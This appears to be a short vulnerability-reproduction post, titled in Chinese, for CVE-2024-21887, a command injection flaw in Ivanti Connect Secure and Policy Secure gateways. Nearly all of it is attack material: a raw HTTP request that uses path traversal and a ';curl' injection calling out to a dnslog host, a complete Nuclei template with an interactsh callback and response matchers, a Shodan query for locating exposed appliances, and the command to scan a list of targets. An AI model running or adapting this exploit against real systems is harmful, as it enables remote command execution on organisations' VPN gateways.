[漏洞复现]CVE-2024-21887

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1Host: x.x.x.xx.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeAccept-Encoding: gzip

id: CVE-2024-21887

info:  name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection  author: pdresearch,parthmalhotra,iamnoooob  severity: critical  description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x)  allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.  reference:    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H    cvss-score: 9.1    cve-id: CVE-2024-21887    cwe-id: CWE-77    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*  metadata:    vendor: ivanti    product: connect_secure    shodan-query: html:"welcome.cgi?p=logo"  tags: cve,cve2024,kev,rce,ivanti

http:  - raw:      - |        GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1        Host: {{Hostname}}

    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol        words:          - "http"

      - type: word        part: header        words:          - 'application/json'

      - type: word        part: body        words:          - '"result":'          - '"message":'        condition: and# digest: 4a0a00473045022100ab17bfbbc711819c8b6309f676ec55c8bf64286aff7a09ee0f916cd8c4d4488002204f743027ff79246dc835029d9bc1b8c8b9721a4bab1c66d4fb00b4e188913243:922c64590222798bb761d5b6d8e72950

nuclei.exe  -l data/CVE-2024-21887.txt -t CVE-2024-21887.yaml